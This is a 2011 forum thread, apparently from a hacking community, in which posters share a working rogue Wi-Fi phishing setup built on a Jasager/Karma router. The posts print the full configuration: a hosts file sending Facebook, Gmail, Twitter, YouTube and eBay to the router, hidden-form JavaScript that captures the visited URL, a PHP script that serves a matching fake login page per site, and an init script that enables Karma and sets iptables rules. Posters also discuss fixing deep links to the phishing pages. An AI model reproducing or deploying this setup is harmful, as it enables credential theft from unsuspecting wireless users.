bmccutch Posted August 1, 2011 That worked perfectly, great work. My only change was to keep the textbox containing the URL from being displayed, by adding: document.theform.host.style.visibility='hidden'; <html> <head> </head> <body> <form action="index.php" method="POST" name="theform"> <input type="text" name="host" value=""/> </form> <script type="text/javascript"> document.theform.host.style.visibility='hidden'; document.theform.host.setAttribute("value",window.location); document.theform.submit(); </script> </body> </html> EDIT: Also, just a thought: if you're worried about the browser not having JavaScript enabled, you could always have a script check whether it's disabled and either just rickroll them or try the other PHP method.
UnDeFiNeD Posted August 1, 2011 Share Posted August 1, 2011 This is how i did it.. root@router:/# cat /etc/config/httpd config 'httpd' option 'port' '1338' option 'home' '/www' config 'httpd' option 'port' '80' option 'home' '/wwwguest' root@router:/# cat /etc/hosts #---------------------------------------- # Local #---------------------------------------- 127.0.0.1 localhost. 10.1.0.2 router jasager #---------------------------------------- # Gateway and services #---------------------------------------- 10.1.0.1 gateway 78.24.191.177 downloads.openwrt.org 46.4.11.11 downloads.x-wrt.org #---------------------------------------- # Phishing #---------------------------------------- 10.1.0.2 www.facebook.com facebook.com 10.1.0.2 www.facebook.dk facebook.dk 10.1.0.2 da-dk.facebook.com #---------------------------------------- 10.1.0.2 www.twitter.com twitter.com 10.1.0.2 www.twitter.dk twitter.dk #---------------------------------------- 10.1.0.2 www.gmail.dk gmail.dk 10.1.0.2 www.gmail.com gmail.com 10.1.0.2 mail.google.com 10.1.0.2 mail.google.dk #---------------------------------------- #10.1.0.2 plus.google.com plus.google.dk #---------------------------------------- 10.1.0.2 www.youtube.com youtube.com #---------------------------------------- 10.1.0.2 www.ebay.com ebay.com #---------------------------------------- #10.1.0.2 www.yahoo.com yahoo.com #---------------------------------------- #10.1.0.2 www.linkedin.com linkedin.com #---------------------------------------- root@router:/# cat /etc/php.ini |egrep www|cgi.force_redirect doc_root = /wwwguest cgi.force_redirect = 0 [code]root@router:/# cat /wwwguest/index.html <html><head></head><body> <div id="hideme"> <form action="index.php" method="POST" name="theform"> <input type="text" name="host" style="width:0px;" value="" type="hidden"/> </form> </div> <script type="text/javascript"> document.getElementById('hideme').style.display='none'; function left(str,n){ if (n <= 0) return ""; else if (n > 
String(str).length) return str; else return String(str).substring(0,n); } function right(str,n){ if (n <= 0) return ""; else if (n > String(str).length) return str; else { var iLen = String(str).length; return String(str).substring(iLen,iLen-n); } } var the_url = window.location.href; var the_url_len = the_url.length-7; the_url = right(the_url,the_url_len) var where_is_slash=the_url.indexOf('/'); the_url = left(the_url,where_is_slash); document.theform.host.setAttribute("value","http://"+the_url); document.theform.submit(); </script> </body> </html> root@router:/# cat /wwwguest/index.php <?php error_reporting(0); $ref = strtolower ( $_POST['host'] ); //$header = str_replace("http://", "https://", $ref); //header ("Location: $header/index.php"); if ("$ref" != "") { if (strpos($ref,"facebook.com")||strpos($ref,"www.facebook.com")||strpos($ref,"facebook.dk")||strpos($ref,"www.facebook.com.")){include('facebook.html');} else if (strpos($ref,"gmail.com")||strpos($ref,"www.gmail.com")||strpos($ref,"gmail.dk")||strpos($ref,"www.gmail.dk")||strpos($ref,"mail.google")){include('gmail.html');} else if (strpos($ref,"twitter.com")||strpos($ref,"www.twitter.com")){include('twitter.html');} else if (strpos($ref,"youtube.com")||strpos($ref,"www.youtube.com")){include('youtube.html');} else if (strpos($ref,"ebay.com")||strpos($ref,"www.ebay.com")){include('ebay.html');} else {include('peets.html');} } else { echo '<html><head>'; echo "<meta http-equiv=\"REFRESH\" content=\"0;url=/index.html\">"; echo '</head><body></body></html>'; } ?> root@router:/etc/init.d# cat /etc/init.d/jasager #!/bin/sh /etc/rc.common # Copyright (C) 2008 dninja@gmail.com START=50 start() { include /lib/network scan_interfaces /karma/bin/create_option_list.rb [ -d /karma/www -a -f /karma/etc/httpd.conf ] && httpd -p 1337 -h /karma/www -r karma -c /karma/etc/httpd.conf # ORIGINAL iptables -I FORWARD -i ath0 -o br-lan -j ACCEPT #------------------------------------------------------------------------------- # 
PREPARE KARMA #------------------------------------------------------------------------------- iwpriv ath0 maccmd 3; sleep 1 # Clear the MAC ignore list iwpriv ath0 maccmd 2; sleep 1 # To make the list a blacklist. # iwpriv ath0 maccmd 1; sleep 1 # To make the list a whitelist. iwpriv ath0 addmac 00:12:34:13:37:12; sleep 1 # Ignore backtrack wifi interface # iwpriv ath0 addkarmassid "Free Internet"; sleep 1 # Ignore my wifi does not work :( iwpriv ath0 karma 1; sleep 1 # Start karma ifconfig ath0 up; sleep 1 # Activate ath0 interface #------------------------------------------------------------------------------- # IPTABLES VARIABLES #------------------------------------------------------------------------------- IPT='/usr/sbin/iptables' GATEWAY="10.1.0.1" # To the internet ( my thinkpad ) JASAGER="10.1.0.2" # To the targets #------------------------------------------------------------------------------- # REMOVE ALL IPTABLES RULES #------------------------------------------------------------------------------- # reset the default policies in the filter table. $IPT -P INPUT ACCEPT $IPT -P FORWARD ACCEPT $IPT -P OUTPUT ACCEPT # reset the default policies in the nat table. $IPT -t nat -P PREROUTING ACCEPT $IPT -t nat -P POSTROUTING ACCEPT $IPT -t nat -P OUTPUT ACCEPT # reset the default policies in the mangle table. $IPT -t mangle -P PREROUTING ACCEPT $IPT -t mangle -P POSTROUTING ACCEPT $IPT -t mangle -P INPUT ACCEPT $IPT -t mangle -P OUTPUT ACCEPT $IPT -t mangle -P FORWARD ACCEPT # flush all the rules in the filter and nat tables. $IPT -F $IPT -t nat -F $IPT -t mangle -F # erase all chains that's not default in filter and nat table. 
$IPT -X $IPT -t nat -X $IPT -t mangle -X #------------------------------------------------------------------------------- # Allow localhost #------------------------------------------------------------------------------- $IPT -A INPUT -s 127.0.0.0/8 -i lo -j ACCEPT $IPT -A OUTPUT -s 127.0.0.0/8 -o lo -j ACCEPT #------------------------------------------------------------------------------- # Allow DNS #------------------------------------------------------------------------------- $IPT -A INPUT -i br-lan -d ${JASAGER} -m udp -p udp --dport 53 -j ACCEPT $IPT -A INPUT -i br-lan -d ${JASAGER} -m tcp -p tcp --dport 53 -j ACCEPT #------------------------------------------------------------------------------- # BLOCK STUFF #------------------------------------------------------------------------------- $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --syn -j DROP # Block SYN $IPT -A INPUT -i eth0 -d ${JASAGER} -f -j DROP # Block Fragments # Block NMAP Scans: $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP # $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL ALL -j DROP # $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL NONE -j DROP # NULL $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags SYN,RST SYN,RST -j DROP # $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP # XMAS $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags FIN,ACK FIN -j DROP # FIN $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP # $IPT -A INPUT -d ${JASAGER} -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT # OK for http requests #------------------------------------------------------------------------------- # iptables -A INPUT -m limit --limit 15/minute -j LOG --log-level 7 --log-prefix "Dropped by firewall:" $IPT -A INPUT -s ! 
${GATEWAY} -d ${JASAGER} -m state --state NEW -j DROP # NEW only from Gateway #------------------------------------------------------------------------------- /usr/sbin/iwconfig ath0 txpower 18 #------------------------------------------------------------------------------- logread -f | awk '{if ($0 ~ /(KARMA: |DHCPACK|DHCPDISCOVER|DHCPOFFER|DHCPREQUEST)/) {sub (/ \(.*\).*: /, ": ", $0); print $0 ;}} ' > /tmp/status.log & tail -f /tmp/status.log | /karma/bin/logwatch & } stop() { killall httpd } Got a question for you: will this point all facebook.com subdirectories to the correct page? It looks like you take the host up to the slash, but will your config settings allow (for example) http://www.facebook.com/careers/?ref=pf to point to the correct phishing page? I haven't figured out how to get around the fact that the Fon tries to look locally for the /careers/?ref=pf page... I will try your way out when I get home; you obviously spent more than the 2 minutes that I took looking for a fix lol...